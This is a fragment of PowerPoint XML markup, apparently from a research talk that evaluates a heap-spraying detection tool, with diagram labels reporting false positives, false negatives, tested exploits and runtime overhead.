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4" r:id="rId4"/>
    <p:sldId id="282" r:id="rId5"/>
    <p:sldId id="283" r:id="rId6"/>
    <p:sldId id="293" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="258" r:id="rId10"/>
    <p:sldId id="259" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="289" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="272" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="28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0066FF" mc:Ignorable=""/>
    <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="FF6699" mc:Ignorable=""/>
    <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="CC00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4" autoAdjust="0"/>
    <p:restoredTop sz="92712" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="99" d="100"/>
          <a:sy n="99" d="100"/>
        </p:scale>
        <p:origin x="-96" y="-30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3AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1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D02A7D5-6746-471C-9C77-5C1A37DD666E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US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B</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" i="1" baseline="-25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endParaRPr lang="en-US" i="1" baseline="-25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7F70EF1-BE9B-4708-900F-0481082114D4}" type="parTrans" cxnId="{417082B0-74B7-46EA-A183-C7C9A3CB8B2C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23A8C26C-F1E5-44A8-BB40-38E5FBD65893}" type="sibTrans" cxnId="{417082B0-74B7-46EA-A183-C7C9A3CB8B2C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5093BB62-78DA-42BE-80B7-A9AC826CBE87}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US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SA(B</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" i="1" baseline="-25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r>
            <a:rPr lang="en-US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en-US" i="1" baseline="30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8185822-B812-4092-9681-B067F0905CD8}" type="parTrans" cxnId="{7F0C9722-28D1-4741-B9E0-18529921EE1C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CA8CD572-E478-4EF9-BF71-A8CE2A347039}" type="sibTrans" cxnId="{7F0C9722-28D1-4741-B9E0-18529921EE1C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6A1B5E2D-5639-42AE-ADBC-D85D50740C0A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US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SA(o)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US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EDB58CB-D494-4A48-8258-89C4B9D16ECE}" type="parTrans" cxnId="{6E2A4DF4-3EC4-48DF-BD59-5392A726D64D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3293A510-2C27-4FC6-867F-43594E568577}" type="sibTrans" cxnId="{6E2A4DF4-3EC4-48DF-BD59-5392A726D64D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CCD341BD-DD3F-4BF0-8F1B-125DFE14BD89}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US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SA(H)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US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EA01D44-F1AA-435C-B8E2-AB26BFCA6815}" type="parTrans" cxnId="{F3F329FF-7495-4F98-A23B-EED0BBCC5B75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F2A29C01-661D-4223-B2B8-479D7B2023D0}" type="sibTrans" cxnId="{F3F329FF-7495-4F98-A23B-EED0BBCC5B75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75473B90-DFE4-42BA-8202-3BA8D49C8793}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" i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NSA(H)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" i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D04201-1537-4CC1-8C90-2DAF8610793F}" type="parTrans" cxnId="{A22C682D-86A4-43C0-A320-755274D4E9A5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6FE77816-3ABE-4EC3-A618-EDEDC32A3B1A}" type="sibTrans" cxnId="{A22C682D-86A4-43C0-A320-755274D4E9A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" i="1">
            <a:latin typeface="Freestyle Script" pitchFamily="66" charset="0"/>
            <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E83822F-5DC6-45A5-B027-18D5FBD9E1A2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" i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obj</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2600" i="1" baseline="30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8FA973B-F668-4F4A-AD1B-1357648E3F57}" type="parTrans" cxnId="{ED006E85-BAAA-4CD0-B1FF-F98F36503916}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEDFD04B-4C24-40C6-B000-DF1F7D9BFFEA}" type="sibTrans" cxnId="{ED006E85-BAAA-4CD0-B1FF-F98F36503916}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" type="pres">
      <dgm:prSet presAssocID="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A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F11FE-0708-4901-A35E-6755011328C2}" type="pres">
      <dgm:prSet presAssocID="{5E83822F-5DC6-45A5-B027-18D5FBD9E1A2}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29D603E6-D1CA-4B35-B3FE-A5B5E8B64D13}" type="pres">
      <dgm:prSet presAssocID="{5E83822F-5DC6-45A5-B027-18D5FBD9E1A2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910B3-A3E3-4FB6-8173-F3EA353F641F}" type="pres">
      <dgm:prSet presAssocID="{CEDFD04B-4C24-40C6-B000-DF1F7D9BFFEA}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B6BD19F-F70F-4825-8155-13EB7F5D86CC}" type="pres">
      <dgm:prSet presAssocID="{7D02A7D5-6746-471C-9C77-5C1A37DD666E}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2EEFC4A4-AF3C-486B-982F-75194A1DA8A7}" type="pres">
      <dgm:prSet presAssocID="{7D02A7D5-6746-471C-9C77-5C1A37DD666E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5B892-F379-43DC-B59B-A10218BC6885}" type="pres">
      <dgm:prSet presAssocID="{23A8C26C-F1E5-44A8-BB40-38E5FBD65893}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F05E0389-0537-4729-A64B-FF1A7F16E718}" type="pres">
      <dgm:prSet presAssocID="{5093BB62-78DA-42BE-80B7-A9AC826CBE87}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B98DCEC2-04D0-4DD5-93BF-3ED86B4CD02F}" type="pres">
      <dgm:prSet presAssocID="{5093BB62-78DA-42BE-80B7-A9AC826CBE87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64A8-5E75-4643-8E23-B9DC31C662A8}" type="pres">
      <dgm:prSet presAssocID="{CA8CD572-E478-4EF9-BF71-A8CE2A347039}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6317A839-2063-435B-9079-E0C0534B1BB5}" type="pres">
      <dgm:prSet presAssocID="{6A1B5E2D-5639-42AE-ADBC-D85D50740C0A}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F0C3D76-C097-44BD-8861-D5701E565E18}" type="pres">
      <dgm:prSet presAssocID="{6A1B5E2D-5639-42AE-ADBC-D85D50740C0A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22335-461B-48BA-B7B2-5C5C4823A97E}" type="pres">
      <dgm:prSet presAssocID="{3293A510-2C27-4FC6-867F-43594E568577}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E40D0F88-7C3E-40CB-A457-905A8CECD5A6}" type="pres">
      <dgm:prSet presAssocID="{CCD341BD-DD3F-4BF0-8F1B-125DFE14BD89}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA7DD902-AE6A-4281-915A-FCF738B93D4F}" type="pres">
      <dgm:prSet presAssocID="{CCD341BD-DD3F-4BF0-8F1B-125DFE14BD89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8C96F-64FA-4EBF-8D28-682A05591407}" type="pres">
      <dgm:prSet presAssocID="{F2A29C01-661D-4223-B2B8-479D7B2023D0}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB87361A-0417-47BD-8FAB-AA94F54635DE}" type="pres">
      <dgm:prSet presAssocID="{75473B90-DFE4-42BA-8202-3BA8D49C8793}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0EFE44DC-8BC8-406D-AC6C-5B9DF13F9963}" type="pres">
      <dgm:prSet presAssocID="{75473B90-DFE4-42BA-8202-3BA8D49C8793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3E440-24ED-4D0A-B594-1FB1A79645C6}" type="pres">
      <dgm:prSet presAssocID="{6FE77816-3ABE-4EC3-A618-EDEDC32A3B1A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D19CF4C-0B7B-4C7B-AFD4-353DB2F3E5BA}" type="presOf" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{A22C682D-86A4-43C0-A320-755274D4E9A5}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{75473B90-DFE4-42BA-8202-3BA8D49C8793}" srcOrd="5" destOrd="0" parTransId="{1DD04201-1537-4CC1-8C90-2DAF8610793F}" sibTransId="{6FE77816-3ABE-4EC3-A618-EDEDC32A3B1A}"/>
    <dgm:cxn modelId="{7F0C9722-28D1-4741-B9E0-18529921EE1C}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{5093BB62-78DA-42BE-80B7-A9AC826CBE87}" srcOrd="2" destOrd="0" parTransId="{E8185822-B812-4092-9681-B067F0905CD8}" sibTransId="{CA8CD572-E478-4EF9-BF71-A8CE2A347039}"/>
    <dgm:cxn modelId="{973D0A06-7ED4-4334-84B9-4B1B6CCF17CD}" type="presOf" srcId="{5093BB62-78DA-42BE-80B7-A9AC826CBE87}" destId="{B98DCEC2-04D0-4DD5-93BF-3ED86B4CD02F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{118EAA33-FA34-40BD-B570-FEF26A958D47}" type="presOf" srcId="{CCD341BD-DD3F-4BF0-8F1B-125DFE14BD89}" destId="{CA7DD902-AE6A-4281-915A-FCF738B93D4F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{417082B0-74B7-46EA-A183-C7C9A3CB8B2C}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{7D02A7D5-6746-471C-9C77-5C1A37DD666E}" srcOrd="1" destOrd="0" parTransId="{B7F70EF1-BE9B-4708-900F-0481082114D4}" sibTransId="{23A8C26C-F1E5-44A8-BB40-38E5FBD65893}"/>
    <dgm:cxn modelId="{CD6F6047-6E10-411B-8A48-5D74C7BA8084}" type="presOf" srcId="{7D02A7D5-6746-471C-9C77-5C1A37DD666E}" destId="{2EEFC4A4-AF3C-486B-982F-75194A1DA8A7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{6A4B4360-EC4C-4EAD-893B-6C46145256AE}" type="presOf" srcId="{5E83822F-5DC6-45A5-B027-18D5FBD9E1A2}" destId="{29D603E6-D1CA-4B35-B3FE-A5B5E8B64D13}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{F3F329FF-7495-4F98-A23B-EED0BBCC5B75}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{CCD341BD-DD3F-4BF0-8F1B-125DFE14BD89}" srcOrd="4" destOrd="0" parTransId="{8EA01D44-F1AA-435C-B8E2-AB26BFCA6815}" sibTransId="{F2A29C01-661D-4223-B2B8-479D7B2023D0}"/>
    <dgm:cxn modelId="{6E2A4DF4-3EC4-48DF-BD59-5392A726D64D}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{6A1B5E2D-5639-42AE-ADBC-D85D50740C0A}" srcOrd="3" destOrd="0" parTransId="{7EDB58CB-D494-4A48-8258-89C4B9D16ECE}" sibTransId="{3293A510-2C27-4FC6-867F-43594E568577}"/>
    <dgm:cxn modelId="{43ACB1E2-4A44-41A2-ABA6-C3162A8544E0}" type="presOf" srcId="{75473B90-DFE4-42BA-8202-3BA8D49C8793}" destId="{0EFE44DC-8BC8-406D-AC6C-5B9DF13F9963}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{7E4B6B83-D71D-4F72-A98C-552E9302DA22}" type="presOf" srcId="{6FE77816-3ABE-4EC3-A618-EDEDC32A3B1A}" destId="{3E33E440-24ED-4D0A-B594-1FB1A79645C6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{65E75DB9-0A45-4506-A8E7-E5BC4A75E485}" type="presOf" srcId="{CEDFD04B-4C24-40C6-B000-DF1F7D9BFFEA}" destId="{C84910B3-A3E3-4FB6-8173-F3EA353F641F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{701FD3EB-981E-474C-AC23-228697AA15A6}" type="presOf" srcId="{6A1B5E2D-5639-42AE-ADBC-D85D50740C0A}" destId="{2F0C3D76-C097-44BD-8861-D5701E565E18}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{3C455B1E-2A84-461B-88FD-CD516138E2DD}" type="presOf" srcId="{F2A29C01-661D-4223-B2B8-479D7B2023D0}" destId="{46E8C96F-64FA-4EBF-8D28-682A05591407}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{020077CC-6088-48D5-A600-1358BF86910C}" type="presOf" srcId="{23A8C26C-F1E5-44A8-BB40-38E5FBD65893}" destId="{5735B892-F379-43DC-B59B-A10218BC6885}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{A6B2A275-4D12-4DB4-8D48-098B58F14ABF}" type="presOf" srcId="{CA8CD572-E478-4EF9-BF71-A8CE2A347039}" destId="{BB7964A8-5E75-4643-8E23-B9DC31C662A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{ED006E85-BAAA-4CD0-B1FF-F98F36503916}" srcId="{EF13AE14-DD9E-40A2-8347-ACD3F1DD4A6F}" destId="{5E83822F-5DC6-45A5-B027-18D5FBD9E1A2}" srcOrd="0" destOrd="0" parTransId="{38FA973B-F668-4F4A-AD1B-1357648E3F57}" sibTransId="{CEDFD04B-4C24-40C6-B000-DF1F7D9BFFEA}"/>
    <dgm:cxn modelId="{5B71D73A-F6DC-4519-82F5-2BC422756FF4}" type="presOf" srcId="{3293A510-2C27-4FC6-867F-43594E568577}" destId="{17E22335-461B-48BA-B7B2-5C5C4823A97E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{2C50CB36-7B32-446B-AB07-D98D65EA04CD}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{BB1F11FE-0708-4901-A35E-6755011328C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{00FAA445-C03B-489B-8027-142C4EC48836}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{29D603E6-D1CA-4B35-B3FE-A5B5E8B64D13}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{03B472C9-14A3-4CE7-9F10-6629E76FF644}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{C84910B3-A3E3-4FB6-8173-F3EA353F641F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{707EDD3A-7BE8-47C9-8A47-27A91F82E579}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{4B6BD19F-F70F-4825-8155-13EB7F5D86CC}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{49B10704-5021-45E6-972D-8A89A6DD0964}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{2EEFC4A4-AF3C-486B-982F-75194A1DA8A7}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{49699723-3B26-4ACA-853B-EF320E3CED7C}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{5735B892-F379-43DC-B59B-A10218BC6885}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{13C71B4D-2EA1-4F7B-86E5-758D1480D01C}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{F05E0389-0537-4729-A64B-FF1A7F16E718}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{A28DD619-F616-4F5D-8FC1-814CA576115C}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{B98DCEC2-04D0-4DD5-93BF-3ED86B4CD02F}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{EBDA086F-B1E3-4971-B513-A7D68C5FC731}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{BB7964A8-5E75-4643-8E23-B9DC31C662A8}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{95223AEF-49E2-4132-9AA9-2C1B7D60E366}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{6317A839-2063-435B-9079-E0C0534B1BB5}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{75D56310-25E8-4537-9925-2E7F70E7DC62}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{2F0C3D76-C097-44BD-8861-D5701E565E18}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{4DBA2407-8EE8-49D2-B2A7-2CE5313D44E8}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{17E22335-461B-48BA-B7B2-5C5C4823A97E}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{DAF995CB-3CE7-446D-A4FB-92448E91E891}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{E40D0F88-7C3E-40CB-A457-905A8CECD5A6}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{F4540644-B269-4C20-BEF5-477BA2E23C39}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{CA7DD902-AE6A-4281-915A-FCF738B93D4F}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{86E13594-FCE9-4FCE-BF59-05E6B2D61975}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{46E8C96F-64FA-4EBF-8D28-682A05591407}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{1515C3FA-E1C5-43A8-9E76-8D5F9E2DF651}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{FB87361A-0417-47BD-8FAB-AA94F54635DE}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{22788515-BA81-4672-B926-8284FA647267}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{0EFE44DC-8BC8-406D-AC6C-5B9DF13F9963}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{5131818A-BD60-44BD-B8F2-0ACED123EDA2}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{3E33E440-24ED-4D0A-B594-1FB1A79645C6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6226F-41F8-4C7F-9438-1530F832FC6B}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList4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1AFB3E-E495-4E70-964A-A0FF7D3E9244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 0 False Positives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C5B9E11-4B1E-490A-ADA4-504825673E7D}" type="parTrans" cxnId="{D9C1FDC9-8BF4-4E00-9692-8877F41825B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A119868A-DCF7-4BD0-AD85-13F46B2D9472}" type="sibTrans" cxnId="{D9C1FDC9-8BF4-4E00-9692-8877F41825B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D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150 top Web sites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782B4437-07A0-4E5A-85C7-3FF83CC4E84E}" type="parTrans" cxnId="{317D533E-2015-4FA3-8B41-8C9F126D5CD4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E01572F0-8222-4FB7-9B54-517D0F0F4B27}" type="sibTrans" cxnId="{317D533E-2015-4FA3-8B41-8C9F126D5CD4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78A9692A-5B4C-40AF-8E22-6B8248126FC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 0 False Negatives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A767E8E-0D70-4D86-8E25-6514472640C4}" type="parTrans" cxnId="{9816829D-4939-494B-8F89-A1C3F157C491}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5624F10E-DC3C-4643-A92B-2A499E9B5B28}" type="sibTrans" cxnId="{9816829D-4939-494B-8F89-A1C3F157C491}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D11AD2A-5602-4199-8990-A60E96D171E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12 published heap spraying exploits and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1DFA58F4-89F8-46BA-BB88-CEC3495411EA}" type="parTrans" cxnId="{8C8F7FF4-76D5-4F56-A9DD-66310888E9F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3868F040-BEA2-4A7A-908D-8F7D3FE23CBF}" type="sibTrans" cxnId="{8C8F7FF4-76D5-4F56-A9DD-66310888E9F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A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 Runtime Overhead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72EF87C9-BEC4-4AC0-9FFD-727D2930318D}" type="parTrans" cxnId="{80A65863-D51E-408B-BA1C-AB70CDB9B6F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F621A551-C7AC-44B7-A205-322EF7C41F94}" type="sibTrans" cxnId="{80A65863-D51E-408B-BA1C-AB70CDB9B6F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F2F1122-473D-46C8-B826-D0BDFADD288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As high as 2x without sampling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A44EAEB2-4EB8-4D05-B0C6-8D7BC5798E5B}" type="parTrans" cxnId="{2665ADC8-9F4F-4001-9A60-B51A0DF9223E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
